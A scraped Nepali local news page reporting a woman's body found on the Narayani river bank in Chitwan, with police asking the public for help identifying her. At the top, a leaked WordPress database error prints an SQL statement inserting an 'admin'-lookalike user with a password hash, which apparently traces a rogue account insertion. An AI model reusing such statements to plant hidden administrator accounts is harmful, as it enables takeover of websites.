WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLOpVuuhLpPMiYUPzb31WV1oYyQ8hz0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:24:14', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
नारायणी नदी किनारमा महिलाको शव फेला – Gaule Khabar

नारायणी नदी किनारमा महिलाको शव फेला

नारायणी नदी किनारमा महिलाको शव फेला

चितवन, फागुन २–

चितवनको नारायणी नदी किनारमा एक महिलाको शव फेला परेको छ ।

भरतपुर उपमहानगरपालिका–१ स्थित नारायणी नदीको किनार अन्दाजी ३०/३५ वर्ष उमेर भएको महिला मृत अवस्थामा भेटिएको प्रहरीले जनाएको छ । छ भन्ने खबर प्राप्त हुना साथ वडा सो महिलाको शव पोष्ट मार्टमको लागि भरतपुर अस्पतालमा राखिएको वडा प्रहरी कार्यालय नारायणगढले जनाएको छ । ५ फिट उचाई, कालो हाईनिक लगाएको अवस्थामा भेटिएको महिला उल्लेखित हुलया संग मिल्ने महिला हराईरहेको भए प्रहरी संग सम्पर्क गरी सनाखत गर्न अनुरोध गरेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका